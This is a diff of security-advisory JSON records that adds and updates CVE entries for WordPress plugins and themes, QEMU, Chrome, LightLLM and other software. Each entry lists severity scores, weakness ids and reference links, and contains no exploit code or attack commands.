"Missing Authorization vulnerability in peregrinethemes Shopwell shopwell allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Shopwell: from n/a through <= 1.0.11.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25333" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/shopwell/vulnerability/wordpress-shopwell-theme-1-0-11-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:18Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xp6f-p933-2gqg/GHSA-xp6f-p933-2gqg.json b/advisories/unreviewed/2026/02/GHSA-xp6f-p933-2gqg/GHSA-xp6f-p933-2gqg.json index 43ef0684817b8..e1bb093941e4b 100644 --- a/advisories/unreviewed/2026/02/GHSA-xp6f-p933-2gqg/GHSA-xp6f-p933-2gqg.json +++ b/advisories/unreviewed/2026/02/GHSA-xp6f-p933-2gqg/GHSA-xp6f-p933-2gqg.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-xp6f-p933-2gqg", - "modified": "2026-02-12T18:30:23Z", + "modified": "2026-02-20T18:31:26Z", "published": "2026-02-12T18:30:23Z", "aliases": [ "CVE-2026-26214" @@ -23,6 +23,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26214" }, + { + "type": "WEB", + "url": "https://github.com/XavLimSG/Vulnerability-Research/blob/main/CVE-2026-26214/CVE-2026-26214.md" + }, { "type": "WEB", "url": "https://github.com/XiaoMi/galaxy-fds-sdk-android" diff --git a/advisories/unreviewed/2026/02/GHSA-xpp8-qpcr-c3rg/GHSA-xpp8-qpcr-c3rg.json b/advisories/unreviewed/2026/02/GHSA-xpp8-qpcr-c3rg/GHSA-xpp8-qpcr-c3rg.json index 15217ea7fcdc0..2d3dc6b78d2e7 100644 --- a/advisories/unreviewed/2026/02/GHSA-xpp8-qpcr-c3rg/GHSA-xpp8-qpcr-c3rg.json +++ b/advisories/unreviewed/2026/02/GHSA-xpp8-qpcr-c3rg/GHSA-xpp8-qpcr-c3rg.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-xpp8-qpcr-c3rg", - "modified": "2026-02-13T21:31:39Z", + "modified": "2026-02-20T21:31:20Z", "published": "2026-02-13T21:31:39Z", "aliases": [ "CVE-2026-2441" @@ -23,9 +23,17 @@ "type": "WEB", "url": "https://chromereleases.googleblog.com/2026/02/stable-channel-update-for-desktop_13.html" }, + { + "type": "WEB", + "url": "https://github.com/huseyinstif/CVE-2026-2441-PoC/blob/main/poc.html" + }, { "type": "WEB", "url": "https://issues.chromium.org/issues/483569511" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-2441" } ], "database_specific": { diff --git a/advisories/unreviewed/2026/02/GHSA-xprw-mh67-9xf5/GHSA-xprw-mh67-9xf5.json b/advisories/unreviewed/2026/02/GHSA-xprw-mh67-9xf5/GHSA-xprw-mh67-9xf5.json new file mode 100644 index 0000000000000..a5f3bc22e464e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xprw-mh67-9xf5/GHSA-xprw-mh67-9xf5.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xprw-mh67-9xf5", + "modified": "2026-02-20T00:31:52Z", + "published": "2026-02-19T18:31:51Z", + "aliases": [ + "CVE-2026-23544" + ], + "details": "Deserialization of Untrusted Data vulnerability in codetipi Valenti valenti allows Object Injection.This issue affects Valenti: from n/a through <= 5.6.3.5.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23544" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/valenti/vulnerability/wordpress-valenti-theme-5-6-3-5-php-object-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xq4j-x39q-xhqm/GHSA-xq4j-x39q-xhqm.json b/advisories/unreviewed/2026/02/GHSA-xq4j-x39q-xhqm/GHSA-xq4j-x39q-xhqm.json new file mode 100644 index 0000000000000..b978e80e92017 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xq4j-x39q-xhqm/GHSA-xq4j-x39q-xhqm.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xq4j-x39q-xhqm", + "modified": "2026-02-20T18:31:40Z", + "published": "2026-02-20T18:31:40Z", + "aliases": [ + "CVE-2026-2818" + ], + "details": "A zip-slip path traversal vulnerability in Spring Data Geode's import snapshot functionality allows attackers to write files outside the intended extraction directory. This vulnerability appears to be susceptible on Windows OS only.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2818" + }, + { + "type": "WEB", + "url": "https://www.herodevs.com/vulnerability-directory/cve-2026-2818" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-23" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T17:25:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xq7w-6f6f-mh93/GHSA-xq7w-6f6f-mh93.json b/advisories/unreviewed/2026/02/GHSA-xq7w-6f6f-mh93/GHSA-xq7w-6f6f-mh93.json new file mode 100644 index 0000000000000..de5353d16c8ab --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xq7w-6f6f-mh93/GHSA-xq7w-6f6f-mh93.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xq7w-6f6f-mh93", + "modified": "2026-02-17T18:32:57Z", + "published": "2026-02-17T18:32:57Z", + "aliases": [ + "CVE-2025-70830" + ], + "details": "A Server-Side Template Injection (SSTI) vulnerability in the Freemarker template engine of Datart v1.0.0-rc.3 allows authenticated attackers to execute arbitrary code via injecting crafted Freemarker template syntax into the SQL script field.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70830" + }, + { + "type": "WEB", + "url": "https://github.com/running-elephant/datart" + }, + { + "type": "WEB", + "url": "https://github.com/xiaoxiaoranxxx/CVE-2025-70830" + }, + { + "type": "WEB", + "url": "https://portswigger.net/web-security/server-side-template-injection" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-94" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T16:20:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xqcm-jrw9-wq72/GHSA-xqcm-jrw9-wq72.json b/advisories/unreviewed/2026/02/GHSA-xqcm-jrw9-wq72/GHSA-xqcm-jrw9-wq72.json index 57ba37db12fa6..44a5357ce56be 100644 --- a/advisories/unreviewed/2026/02/GHSA-xqcm-jrw9-wq72/GHSA-xqcm-jrw9-wq72.json +++ b/advisories/unreviewed/2026/02/GHSA-xqcm-jrw9-wq72/GHSA-xqcm-jrw9-wq72.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-xqcm-jrw9-wq72", - "modified": "2026-02-13T00:32:51Z", + "modified": "2026-02-18T21:31:18Z", "published": "2026-02-13T00:32:51Z", "aliases": [ "CVE-2025-14282" @@ -23,6 +23,18 @@ "type": "WEB", "url": "https://github.com/mkj/dropbear/pull/391" }, + { + "type": "WEB", + "url": "https://github.com/mkj/dropbear/pull/394" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2025-14282" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2420052" + }, { "type": "WEB", "url": "https://lists.ucc.gu.uwa.edu.au/pipermail/dropbear/2025q4/002390.html" diff --git a/advisories/unreviewed/2026/02/GHSA-xrj7-v4x4-74hr/GHSA-xrj7-v4x4-74hr.json b/advisories/unreviewed/2026/02/GHSA-xrj7-v4x4-74hr/GHSA-xrj7-v4x4-74hr.json new file mode 100644 index 0000000000000..d335397c9f0a6 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xrj7-v4x4-74hr/GHSA-xrj7-v4x4-74hr.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xrj7-v4x4-74hr", + "modified": "2026-02-18T21:31:23Z", + "published": "2026-02-18T21:31:23Z", + "aliases": [ + "CVE-2025-8860" + ], + "details": "A flaw was found in QEMU in the uefi-vars virtual device. When the guest writes to register UEFI_VARS_REG_BUFFER_SIZE, the .write callback `uefi_vars_write` is invoked. The function allocates a heap buffer without zeroing the memory, leaving the buffer filled with residual data from prior allocations. When the guest later reads from register UEFI_VARS_REG_PIO_BUFFER_TRANSFER, the .read callback `uefi_vars_read` returns leftover metadata or other sensitive process memory from the previously allocated buffer, leading to an information disclosure vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8860" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2025-8860" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2387588" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-212" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T21:16:22Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xrpj-w92h-g66g/GHSA-xrpj-w92h-g66g.json b/advisories/unreviewed/2026/02/GHSA-xrpj-w92h-g66g/GHSA-xrpj-w92h-g66g.json new file mode 100644 index 0000000000000..db17afa39f654 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xrpj-w92h-g66g/GHSA-xrpj-w92h-g66g.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xrpj-w92h-g66g", + "modified": "2026-02-20T18:31:36Z", + "published": "2026-02-20T18:31:35Z", + "aliases": [ + "CVE-2025-69297" + ], + "details": "Missing Authorization vulnerability in GhostPool Aardvark Plugin aardvark-plugin allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Aardvark Plugin: from n/a through <= 2.19.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69297" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/aardvark-plugin/vulnerability/wordpress-aardvark-plugin-plugin-2-19-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:16Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xv8f-556c-h484/GHSA-xv8f-556c-h484.json b/advisories/unreviewed/2026/02/GHSA-xv8f-556c-h484/GHSA-xv8f-556c-h484.json new file mode 100644 index 0000000000000..4af6821038f94 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xv8f-556c-h484/GHSA-xv8f-556c-h484.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xv8f-556c-h484", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2025-69402" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in ThemeREX R&F rf allows PHP Local File Inclusion.This issue affects R&F: from n/a through <= 1.5.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69402" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/rf/vulnerability/wordpress-r-f-theme-1-5-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xw2v-8hw2-2rc4/GHSA-xw2v-8hw2-2rc4.json b/advisories/unreviewed/2026/02/GHSA-xw2v-8hw2-2rc4/GHSA-xw2v-8hw2-2rc4.json new file mode 100644 index 0000000000000..a5aca835cc3f6 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xw2v-8hw2-2rc4/GHSA-xw2v-8hw2-2rc4.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xw2v-8hw2-2rc4", + "modified": "2026-02-20T09:31:21Z", + "published": "2026-02-20T09:31:21Z", + "aliases": [ + "CVE-2026-26370" + ], + "details": "WordPress Plugin \"Survey Maker\" versions 5.1.7.7 and prior contain a cross-site scripting vulnerability. If this vulnerability is exploited, an arbitrary script may be executed in the user's web browser.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26370" + }, + { + "type": "WEB", + "url": "https://jvn.jp/en/jp/JVN20049394" + }, + { + "type": "WEB", + "url": "https://wordpress.org/plugins/survey-maker" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T08:17:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xw73-fccw-fgc4/GHSA-xw73-fccw-fgc4.json b/advisories/unreviewed/2026/02/GHSA-xw73-fccw-fgc4/GHSA-xw73-fccw-fgc4.json new file mode 100644 index 0000000000000..3c8a8c96cec47 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xw73-fccw-fgc4/GHSA-xw73-fccw-fgc4.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xw73-fccw-fgc4", + "modified": "2026-02-18T18:30:39Z", + "published": "2026-02-18T18:30:39Z", + "aliases": [ + "CVE-2025-65791" + ], + "details": "ZoneMinder v1.36.34 is vulnerable to Command Injection in web/views/image.php. The application passes unsanitized user input directly to the exec() function.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-65791" + }, + { + "type": "WEB", + "url": "https://github.com/rishavand1/CVE-2025-65791" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T16:22:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xw8j-p597-rjrj/GHSA-xw8j-p597-rjrj.json b/advisories/unreviewed/2026/02/GHSA-xw8j-p597-rjrj/GHSA-xw8j-p597-rjrj.json index 767d768b5a160..ee81c183161eb 100644 --- a/advisories/unreviewed/2026/02/GHSA-xw8j-p597-rjrj/GHSA-xw8j-p597-rjrj.json +++ b/advisories/unreviewed/2026/02/GHSA-xw8j-p597-rjrj/GHSA-xw8j-p597-rjrj.json @@ -41,7 +41,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-200" + ], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2026/02/GHSA-xwc9-vwhh-qfwc/GHSA-xwc9-vwhh-qfwc.json b/advisories/unreviewed/2026/02/GHSA-xwc9-vwhh-qfwc/GHSA-xwc9-vwhh-qfwc.json new file mode 100644 index 0000000000000..0c68b580efe5d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xwc9-vwhh-qfwc/GHSA-xwc9-vwhh-qfwc.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xwc9-vwhh-qfwc", + "modified": "2026-02-19T21:30:46Z", + "published": "2026-02-19T18:31:55Z", + "aliases": [ + "CVE-2026-23606" + ], + "details": "GFI MailEssentials AI versions prior to 22.4 contain a stored cross-site scripting vulnerability in the Advanced Content Filtering rule creation workflow. An authenticated user can supply HTML/JavaScript in the ctl00$ContentPlaceHolder1$pv1$txtRuleName parameter to /MailEssentials/pages/MailSecurity/advancedfiltering.aspx, which is stored and later rendered in the management interface, allowing script execution in the context of a logged-in user.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23606" + }, + { + "type": "WEB", + "url": "https://gfi.ai/products-and-solutions/network-security-solutions/mailessentials/resources/documentation/product-releases" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gfi-mailessentials-ai-advanced-content-filtering-rule-stored-xss" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T18:24:54Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xwhr-hxqf-pv44/GHSA-xwhr-hxqf-pv44.json b/advisories/unreviewed/2026/02/GHSA-xwhr-hxqf-pv44/GHSA-xwhr-hxqf-pv44.json new file mode 100644 index 0000000000000..0fcb203fa5f4b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xwhr-hxqf-pv44/GHSA-xwhr-hxqf-pv44.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xwhr-hxqf-pv44", + "modified": "2026-02-21T00:31:42Z", + "published": "2026-02-21T00:31:42Z", + "aliases": [ + "CVE-2026-0777" + ], + "details": "Xmind Attachment Insufficient UI Warning Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Xmind. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the handling of attachments. When opening an attachment, the user interface fails to warn the user of unsafe actions. An attacker can leverage this vulnerability to execute code in the context of current user. Was ZDI-CAN-26034.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0777" + }, + { + "type": "WEB", + "url": "https://www.zerodayinitiative.com/advisories/ZDI-26-069" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-356" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T22:16:19Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xwm4-xpf9-mh28/GHSA-xwm4-xpf9-mh28.json b/advisories/unreviewed/2026/02/GHSA-xwm4-xpf9-mh28/GHSA-xwm4-xpf9-mh28.json new file mode 100644 index 0000000000000..a1102b19ebc59 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xwm4-xpf9-mh28/GHSA-xwm4-xpf9-mh28.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xwm4-xpf9-mh28", + "modified": "2026-02-19T21:30:45Z", + "published": "2026-02-19T18:31:53Z", + "aliases": [ + "CVE-2026-25402" + ], + "details": "Missing Authorization vulnerability in echoplugins Knowledge Base for Documentation, FAQs with AI Assistance echo-knowledge-base allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Knowledge Base for Documentation, FAQs with AI Assistance: from n/a through <= 16.011.0.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25402" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/echo-knowledge-base/vulnerability/wordpress-knowledge-base-for-documentation-faqs-with-ai-assistance-plugin-16-011-0-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:22Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xwqg-rc23-pwjj/GHSA-xwqg-rc23-pwjj.json b/advisories/unreviewed/2026/02/GHSA-xwqg-rc23-pwjj/GHSA-xwqg-rc23-pwjj.json new file mode 100644 index 0000000000000..3ce1d48597cc9 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xwqg-rc23-pwjj/GHSA-xwqg-rc23-pwjj.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xwqg-rc23-pwjj", + "modified": "2026-02-19T18:31:49Z", + "published": "2026-02-19T18:31:49Z", + "aliases": [ + "CVE-2025-12975" + ], + "details": "The CTX Feed – WooCommerce Product Feed Manager plugin for WordPress is vulnerable to unauthorized arbitrary plugin installation due to a missing capability check on the woo_feed_plugin_installing() function in all versions up to, and including, 6.6.11. This makes it possible for authenticated attackers, with Shop Manager-level access and above, to install arbitrary plugins which can be leveraged to achieve remote code execution.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12975" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3417230%40webappick-product-feed-for-woocommerce&new=3417230%40webappick-product-feed-for-woocommerce&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://wordpress.org/plugins/webappick-product-feed-for-woocommerce" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/4f77f4cd-f4b3-42bc-a1a9-e5df5daa42b7?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T07:17:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xxv9-73gc-96fm/GHSA-xxv9-73gc-96fm.json b/advisories/unreviewed/2026/02/GHSA-xxv9-73gc-96fm/GHSA-xxv9-73gc-96fm.json new file mode 100644 index 0000000000000..cb6abd7d82744 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xxv9-73gc-96fm/GHSA-xxv9-73gc-96fm.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xxv9-73gc-96fm", + "modified": "2026-02-17T03:30:15Z", + "published": "2026-02-17T03:30:15Z", + "aliases": [ + "CVE-2026-26220" + ], + "details": "LightLLM version 1.1.0 and prior contain an unauthenticated remote code execution vulnerability in PD (prefill-decode) disaggregation mode. The PD master node exposes WebSocket endpoints that receive binary frames and pass the data directly to pickle.loads() without authentication or validation. A remote attacker who can reach the PD master can send a crafted payload to achieve arbitrary code execution.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26220" + }, + { + "type": "WEB", + "url": "https://github.com/ModelTC/LightLLM/issues/1213" + }, + { + "type": "WEB", + "url": "https://chocapikk.com/posts/2026/lightllm-pickle-rce" + }, + { + "type": "WEB", + "url": "https://github.com/ModelTC/lightllm/blob/a27dfc88c2144ed51a6e160b6fbe20aad66c8fe0/lightllm/server/api_http.py#L310" + }, + { + "type": "WEB", + "url": "https://github.com/ModelTC/lightllm/blob/a27dfc88c2144ed51a6e160b6fbe20aad66c8fe0/lightllm/server/api_http.py#L331" + }, + { + "type": "WEB", + "url": "https://lightllm-en.readthedocs.io/en/latest/index.html" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/lightllm-pd-mode-unsafe-deserialization-rce" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T03:16:01Z" + } +} \ No newline at end of file